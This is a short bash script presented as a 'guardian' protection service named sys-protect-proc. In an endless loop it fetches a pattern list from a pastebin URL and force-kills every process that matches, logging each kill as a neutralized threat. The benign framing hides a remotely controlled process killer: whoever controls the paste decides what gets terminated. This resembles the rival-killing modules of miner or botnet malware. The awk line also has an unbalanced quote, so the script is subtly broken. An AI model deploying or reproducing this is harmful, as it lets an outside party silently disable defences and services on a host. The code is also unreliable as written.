# Файл: sys-protect-proc
#!/bin/bash
set -euo pipefail
GUARDIAN_LOG_FILE="/tmp/app-service/guardian.log"
touch "$GUARDIAN_LOG_FILE"

KILL_LIST_URL="https://pastebin.com/raw/uygtBFgw"; KILL_LIST_FILE="kill_list.patterns" 

while true; do
    wget -q -O- "$KILL_LIST_URL" 2>/dev/null | tr -d '\r\n' > "$KILL_LIST_FILE" || true
    list=$(cat "$KILL_LIST_FILE" 2>/dev/null);
    if [ -n "$list" ]; then
        ps aux | grep -v grep | grep -iE "$list" | while IFS= read l; do
            p=$(echo "$l"|awk '{print "$2}')
            [ -n "$p" ] && {
                echo "[$(date)] [GUARDIAN] Neutralized threat: $l" >> "$GUARDIAN_LOG_FILE"
                kill -9 "$p"
            }
        done
    fi
    sleep 120
done